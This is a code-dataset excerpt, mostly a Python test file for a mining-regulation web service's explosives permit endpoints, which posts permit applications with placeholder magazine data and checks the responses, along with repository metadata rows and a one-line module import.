self.assertEquals([['val', 'val2'], ['val3', 'val4']], parser.raw_rows)
self.assertFalse(parser.has_semicolon)
self.assertEquals(1, len(parser.warnings))
| 36.603448
| 111
| 0.643429
| 244
| 2,123
| 5.495902
| 0.213115
| 0.178971
| 0.080537
| 0.085011
| 0.850112
| 0.850112
| 0.850112
| 0.850112
| 0.850112
| 0.796421
| 0
| 0.016314
| 0.220443
| 2,123
| 57
| 112
| 37.245614
| 0.793958
| 0.130947
| 0
| 0.636364
| 0
| 0
| 0.165123
| 0.032153
| 0
| 0
| 0
| 0
| 0.636364
| 1
| 0.090909
| false
| 0
| 0.060606
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aea90d1f345dd0af0fa247487e6e127128f22aef
| 5,431
|
py
|
Python
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
bcgov/mds
|
6c427a66a5edb4196222607291adef8fd6677038
|
[
"Apache-2.0"
] | 25
|
2018-07-09T19:04:37.000Z
|
2022-03-15T17:27:10.000Z
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
areyeslo/mds
|
e8c38e593e09b78e2a57009c0d003d6c4bfa32e6
|
[
"Apache-2.0"
] | 983
|
2018-04-25T20:08:07.000Z
|
2022-03-31T21:45:20.000Z
|
services/core-api/tests/mines/explosives_permit/resources/test_explosives_permit_list_resource.py
|
areyeslo/mds
|
e8c38e593e09b78e2a57009c0d003d6c4bfa32e6
|
[
"Apache-2.0"
] | 58
|
2018-05-15T22:35:50.000Z
|
2021-11-29T19:40:52.000Z
|
import json
from tests.factories import ExplosivesPermitFactory, MinePartyAppointmentFactory, create_mine_and_permit
def test_get_explosives_permit_by_mine_guid(test_client, db_session, auth_headers):
explosives_permit = ExplosivesPermitFactory()
get_resp = test_client.get(
f'/mines/{explosives_permit.mine_guid}/explosives-permits',
headers=auth_headers['full_auth_header'])
get_data = json.loads(get_resp.data.decode())
assert get_resp.status_code == 200, get_resp.response
assert len(get_data['records']) == 1
def test_post_explosives_permit_application(test_client, db_session, auth_headers):
mine, permit = create_mine_and_permit()
mine_manager = MinePartyAppointmentFactory(mine=mine)
permittee = MinePartyAppointmentFactory(mine=mine)
data = {
'originating_system':
'Core',
'permit_guid':
str(permit.permit_guid),
'mine_manager_mine_party_appt_id':
mine_manager.mine_party_appt_id,
'permittee_mine_party_appt_id':
permittee.mine_party_appt_id,
'application_date':
'2021-07-12',
'description':
'Other Information.',
'latitude':
'54',
'longitude':
'40',
'explosive_magazines': [{
'type_no': '1',
'tag_no': '1',
'construction': '1',
'quantity': '1',
'latitude': '1',
'longitude': '1',
'distance_road': '1',
'distance_dwelling': '1',
'length': '1',
'width': '1',
'height': '1'
}],
'detonator_magazines': [{
'type_no': '1',
'tag_no': '1',
'construction': '1',
'quantity': '1',
'longitude': '1',
'latitude': '1',
'detonator_type': '1',
'distance_road': '1',
'distance_dwelling': '1',
'width': '1',
'height': '1',
'length': '1'
}]
}
post_resp = test_client.post(
f'/mines/{mine.mine_guid}/explosives-permits',
json=data,
headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 201
assert len(mine.explosives_permits) == 1
post_data = json.loads(post_resp.data.decode())
assert post_data['mine_guid'] == str(mine.mine_guid)
assert post_data['permit_guid'] == data['permit_guid']
assert post_data['application_status'] == 'REC'
assert post_data['application_number'] != None
assert post_data['received_timestamp'] != None
assert post_data['is_closed'] == False
assert post_data['permit_number'] == None
assert post_data['issue_date'] == None
assert post_data['expiry_date'] == None
assert len(post_data['explosive_magazines']) == len(data['explosive_magazines'])
assert len(post_data['detonator_magazines']) == len(data['detonator_magazines'])
def test_post_explosives_permit_historical(test_client, db_session, auth_headers):
mine, permit = create_mine_and_permit()
mine_manager = MinePartyAppointmentFactory(mine=mine)
permittee = MinePartyAppointmentFactory(mine=mine)
data = {
'originating_system':
'MMS',
'permit_guid':
str(permit.permit_guid),
'mine_manager_mine_party_appt_id':
mine_manager.mine_party_appt_id,
'permittee_mine_party_appt_id':
permittee.mine_party_appt_id,
'application_date':
'2000-07-12',
'description':
'Other Information.',
'latitude':
'54',
'longitude':
'40',
'explosive_magazines': [{
'type_no': '1',
'tag_no': '1',
'construction': '1',
'quantity': '1',
'latitude': '1',
'longitude': '1',
'distance_road': '1',
'distance_dwelling': '1',
'length': '1',
'width': '1',
'height': '1'
}],
'detonator_magazines': [{
'type_no': '1',
'tag_no': '1',
'construction': '1',
'quantity': '1',
'longitude': '1',
'latitude': '1',
'detonator_type': '1',
'distance_road': '1',
'distance_dwelling': '1',
'width': '1',
'height': '1',
'length': '1'
}],
'permit_number':
'BC-1042',
'issue_date':
'2001-07-12',
'expiry_date':
'2001-07-12',
}
post_resp = test_client.post(
f'/mines/{mine.mine_guid}/explosives-permits',
json=data,
headers=auth_headers['full_auth_header'])
assert post_resp.status_code == 201
assert len(mine.explosives_permits) == 1
post_data = json.loads(post_resp.data.decode())
assert post_data['application_status'] == 'APP'
assert post_data['mine_guid'] == str(mine.mine_guid)
assert post_data['permit_guid'] == data['permit_guid']
assert post_data['originating_system'] == data['originating_system']
assert post_data['permit_number'] == data['permit_number']
assert post_data['application_number'] == None
assert post_data['received_timestamp'] == None
assert len(post_data['explosive_magazines']) == len(data['explosive_magazines'])
assert len(post_data['detonator_magazines']) == len(data['detonator_magazines'])
| 33.115854
| 104
| 0.582766
| 575
| 5,431
| 5.182609
| 0.161739
| 0.05906
| 0.075168
| 0.040268
| 0.815436
| 0.762416
| 0.741611
| 0.741611
| 0.741611
| 0.741611
| 0
| 0.025928
| 0.27564
| 5,431
| 163
| 105
| 33.319018
| 0.731571
| 0
| 0
| 0.77027
| 0
| 0
| 0.287424
| 0.047321
| 0
| 0
| 0
| 0
| 0.175676
| 1
| 0.02027
| false
| 0
| 0.013514
| 0
| 0.033784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aeaa7dcd45ad9fd3fae24f3f9973e9c9dbe92a5b
| 37
|
py
|
Python
|
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | 3
|
2019-04-05T08:37:01.000Z
|
2020-06-25T15:21:49.000Z
|
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | null | null | null |
tNLM/__init__.py
|
kristianeschenburg/tNLM
|
587fb6c9539493c6de691d28adbd6bab7f93274d
|
[
"MIT"
] | 1
|
2021-02-20T03:51:59.000Z
|
2021-02-20T03:51:59.000Z
|
from .temporalNonLocalMeans import *
| 18.5
| 36
| 0.837838
| 3
| 37
| 10.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.